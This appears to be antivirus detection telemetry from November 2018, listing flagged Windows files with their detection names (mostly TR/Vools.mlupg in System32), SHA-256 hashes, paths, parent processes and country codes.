  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1274d6acfe66ff0d15e9f18aabc912135dda52fb2655b5746cac5c84a31bad0e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1274d6acfe66ff0d15e9f18aabc912135dda52fb2655b5746cac5c84a31bad0e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ex_gss1_0134596.exe', filepath='\\\\?\\C:\\EX_2018\\EX_Gss1_0134596.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='12b96127252952df8a2e4ec3b67021b232c990ec4cf63015c48f39cce2066f6f', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='12c1bba7f31ae2dfcf1472f71fb009ed64afcf02a7695f6e24e2a72ab1263410', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='12c1bba7f31ae2dfcf1472f71fb009ed64afcf02a7695f6e24e2a72ab1263410', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level11.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\LEVEL11.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='12c1bba7f31ae2dfcf1472f71fb009ed64afcf02a7695f6e24e2a72ab1263410', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='12d13fd81d7189d4b7b60deb51a90d6f40181f582a2c15ae9ed5d168259496a4', metadata=Row(cmdline='C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\shell32.dll,OpenAs_RunDLL E:\\\\\\\\Program Files\\\\\\\\Eidos Interactive\\\\\\\\Hitman 2 Silent Assassin\\\\\\\\hitman2.exe.SAVEfiles', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T11:59:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='12d13fd81d7189d4b7b60deb51a90d6f40181f582a2c15ae9ed5d168259496a4', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libusb0.dll', filepath='F:\\all mobile softwae\\all driver\\Piranha_box_V1.49 Full Complete by Solim\\Drivers\\Mobile Phone Drivers\\Coolsand_Drivers\\Coolsand_Driver\\libusb0.dll', filesize=432000, name='W32/Ramnit.C.#M1.#R1'), hash='138b433749070312fe1b7407d1ddc31c1b59a0e1432c45b7132da9d7aa110645', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1207696, timestamp='2018-11-02T14:49:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='139a13c219002d6ac29923247efef74a7f71643514b56196ec29e55b538062b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\139A13C219002D6AC29923247EFEF74A7F71643514B56196EC29E55B538062B4', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='139a13c219002d6ac29923247efef74a7f71643514b56196ec29e55b538062b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='C:\\Program Files\\Microsoft Games\\Minesweeper\\MineSweeper.exe', filesize=896000, name='TR/Patched.Gen.#M300.#R5151'), hash='139e27c07d6903cc24911217be4dddee25e3be5dfe8142b082e6b8ee43da0cbb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T23:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='C:\\Program Files\\Microsoft Games\\Minesweeper\\MineSweeper.exe', filesize=896000, name='TR/Patched.Gen.#M300.#R5151'), hash='139e27c07d6903cc24911217be4dddee25e3be5dfe8142b082e6b8ee43da0cbb', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:53:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-02T10:35:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:35:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:09:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T23:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111007-b7f0b4c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-110830-A4CD279A\\AVSCAN-20181102-111007-B7F0B4C7', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T12:49:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:06:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194934-a04aed9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_759cb39a\\AVSCAN-20181102-194908-9B175095\\AVSCAN-20181102-194934-A04AED9C', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:06:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:39Z'), dt=datetime.date(2018, 11, 2)),
